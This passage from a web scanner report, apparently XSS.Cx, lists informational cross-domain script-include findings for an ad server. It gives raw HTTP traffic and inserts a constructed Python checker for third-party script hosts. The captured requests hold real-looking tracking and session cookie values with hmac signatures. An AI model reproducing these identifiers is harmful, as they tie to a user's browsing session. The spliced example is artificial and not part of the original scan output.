SPdCXDcSXj4i%2EI9dQd%2C

Request

GET /iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313124134052&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p48ptjt/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320324/L=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL/B=ihhvQUoGYno-/J=1315313124134052/K=MkO1E30KWMQ9OU8J05I8pg/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUq!79C8<4H$c; ih="b!!!!,!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV5!!!!#=3f8^"; vuday1=BKZI(BgvR-4M6Eq!79C851U_*; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; lifb=0EA2)A9.-BM7F2P; bh="b!!!#M!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0190.rm.sp2
Set-Cookie: ih="b!!!!#!4ZV4!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: bh="b!!!!#!$?1O!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: vuday1=@n$r!!79C8U9BKI; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9>=4'28!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: uid=uid=23edad00-d886-11e0-8f26-78e7d1f5d92a&_hmacv=1&_salt=3223395414&_keyid=k1&_hmac=46d1029a6a257f1cf41cff0543eaa45aa4369721; path=/; expires=Thu, 06-Oct-2011 12:45:46 GMT
Set-Cookie: lifb=M5Jkn5cn<bEff6B; path=/; expires=Tue, 06-Sep-2011 16:45:46 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:46 GMT
Pragma: no-cache
Content-Length: 1425
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834542);}
</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126412&supply=99&random=1315313146&rfr=http%3A%2F%2Fmaps%2Eyahoo%2Ecom%2Fdarla%5Ffc%3Fcb%3Dyahoo%2Eads%2Edarla%2E%5Floaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf%2D8%26rn%3D1315331124066%26em%3D%257b%2522site%2Dattribute%2522%253a%2522content%253dno%5Fexpandable%253bajax%5Fcert%5Fexpandable%2522%252c%2522ad&rfid=238934&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMty4jAQ%2EJmFwxZYL78IpdoSYAjY5mmHJRdKtgTEGNsxImT%2Efg3epLiuDjOtnurWtBDpxgJGkYhQx%2DYc7UyziwgmMjaEvZMt2O12kQEtQjpIh62X93DA5m44Yr1L%2DB6y%2D3HXwq0RY%2EsbGNe3uX3rg%2E4UOs93nrHLR7iqh302T%2E7pa%2DI%2Eax9Nvt659Wst11QynCfj3rfZwCE%2Dniavax9664U%2DG2yUHwxTv48O08SBXhDrr4E4%2DsHLaTqaHv1vIaOtg1LFEwD7NI94qvFSaH%2E4Ic%2D1OD%2DB1XhEkVHodqESBXxq2ZZNiIZ0XTcQvAHcQbbZ0ZBpdExCwICeeHEGK4ohxoRgHepP3tLpgw3dsOfZDDi%2E5xQRZBAMqynw6N6I0it2x24eFGxZJEGqXZPF1fMPwuJH4zSUC8bC0gM9%2DnY4fCzCfLTJ8jaY1DaVF9YR0aGBgUv94ww5BLprf9GZhfYEGmO72ANGTWwijC2wpBD8%2EPGV%2DbbrQ1rBy5Rvd%2EGvOKL1H3Bx1u6stk1zLqRoFveAzd1DwGZK01LGTZnRi9q17WaZ1bsRVO0GTbMpT7RhRQ2Mz29KtrlS5Vt0UbIiGoRXNc4zJTPVICLLt%2EKz4JngUSobJOIJ%2E9zGslSPdCXDcSXj4i%2EI9dQd%2C"></script>
...[SNIP]...

16.8. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?

Request

GET /iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313355644217&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p035eiu/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320555/L=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk/B=u0uOQmKJiUo-/J=1315313355644217/K=wAUe6WLorFCi06uKuG03Mw/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jsp`9; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!$=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:49:19 GMT
Set-Cookie: vuday1=@n$r$BKZI(BgvR/4M6EqoyOxB!!w[/!79C8kS^YR; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; path=/; expires=Tue, 13-Sep-2011 12:48:14 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:49:19 GMT
Pragma: no-cache
Content-Length: 2881
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982309);}
</script><IFRAME SRC="htt
...[SNIP]...
&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?">
</SCRIPT>
...[SNIP]...
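Every finding in this section reports the same thing: the ad server's response pulls a script from a host other than the one that served the page, so that host (and, since every include here is plain http://, anyone on the path to it) can run code in the including frame. The check below is an added example that is not part of the XSS.Cx report or of any scanner's own code; it reproduces the "Issue detail" logic by parsing a response body with the standard-library HTML parser and listing every script src whose host differs from the serving host, treating scheme-relative (//host/...) includes as cross-domain and relative paths as same-origin. The sample body is constructed from fragments of the responses quoted above (the 2mdn, audienceiq and upper-case SCRIPT SRC includes); the /local/helper.js and //tags.mathtag.com lines are invented to show a same-origin include being ignored and a scheme-relative include being flagged.

```python
"""Cross-domain script include check (added example, not part of the XSS.Cx report)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so <SCRIPT ... SRC=...>
        # arrives here as ("script", [("src", ...)]) like any lower-case tag.
        if tag != "script":
            return
        for name, value in attrs:
            if name == "src" and value:
                self.srcs.append(value.strip())


def script_host(src, serving_host):
    """Host a script src will be fetched from, given the host that served the page."""
    parts = urlsplit(src)
    if parts.netloc:                 # absolute (http://host/...) or scheme-relative (//host/...)
        return parts.netloc.lower()
    return serving_host.lower()      # relative path, or a data: URL: nothing leaves the origin


def cross_domain_scripts(body, serving_host):
    """Return, in document order, the script URLs loaded from a host other than serving_host."""
    collector = _ScriptSrcCollector()
    collector.feed(body)
    collector.close()
    serving_host = serving_host.lower()
    return [src for src in collector.srcs if script_host(src, serving_host) != serving_host]


def third_party_hosts(body, serving_host):
    """Distinct hosts the page hands script execution to, sorted for stable reporting."""
    return sorted({script_host(src, serving_host) for src in cross_domain_scripts(body, serving_host)})


# Constructed sample body: stitched from fragments of the responses quoted in this
# section plus two invented lines (/local/helper.js and the //tags.mathtag.com include).
SAMPLE_BODY = """<html><head><title>Advertisement</title></head><body>
<script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834542);}
</script>
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie;sz=300x250;ord=1315313359?">
</SCRIPT>
<script src="/local/helper.js"></script>
<script src="//tags.mathtag.com/view/js/?strat=109185"></script>
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
</body></html>"""


if __name__ == "__main__":
    # As served by ad.yieldmanager.com (finding 16.8): the doubleclick adj script is cross-domain.
    for src in cross_domain_scripts(SAMPLE_BODY, "ad.yieldmanager.com"):
        print(src)
    print(third_party_hosts(SAMPLE_BODY, "ad.yieldmanager.com"))
```

The same body yields a different list depending on which host served it: run against ad.doubleclick.net the adj include becomes same-origin and drops out, which is why the scanner records the finding per URL rather than per creative. The check compares hosts only, not full origins, so an https page including an http script on the same host would pass it; that case is a mixed-content finding, not this one.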

16.9. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

http://tags.mathtag.com/view/js/?strat=109185&cr=126413&supply=99&random=1315313092&rfr=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443&rfid=238940&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMtuo0AQ%2EJk9rQzDPMAQa7QaG79iE7ABxfhiAUPAmDc42Pv164RstNftQ3d1taqkLognWhD4PJQkJZK5HATKBGKEo1CWNMRH0mQyUTSECJaJOjpsXJ2ZZ3fJpu9u7bLP2rzyzYAYiz%2DAN2yW%2DjH1mbmbrz55xjrLtYfjjFnpl34g%2ErPr%2EJmtvzSP2Q9wuysWVrqefpvp7P6SsrvnzKXt646YutcZziIzZhLx0vVt64Tk6PCL4Xi3Y%2D4i81vI6CjpuuoJgDgrAz8T%2EYaLdz8pSzEsc2CvlxTKKcSlXMvAoGN1rGIsQkKIDNH4AZAGVY2ICAGdtlXZdC2wKZIQesSKCHp6Aad71lFWa3O12py8%2Dvd7vNw7SgbfjEq3G%2D9IgEc9tjJNMD9YFGIo44dehWBLxfzZMSVLz6aniu2r1MnEPt2x2kj42L%2EI%2DSKImV4nNphSaYFuVpeqUdYL4HmwgVhSIZQ0DBHYUL66Huaxs92RcGkWdhKvidb2gFEFKRARGeypBH7%2D%2DJvH8Mw%2EWRRvGQiyMgZtcu142RensGyKqAFV2XagO1%2EOQuA3QdQITZT756IVrkWUV1l5j7jgF1xoff7r2hT0YST0lUII%2EgN86sV0%2C

Request

GET /iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%2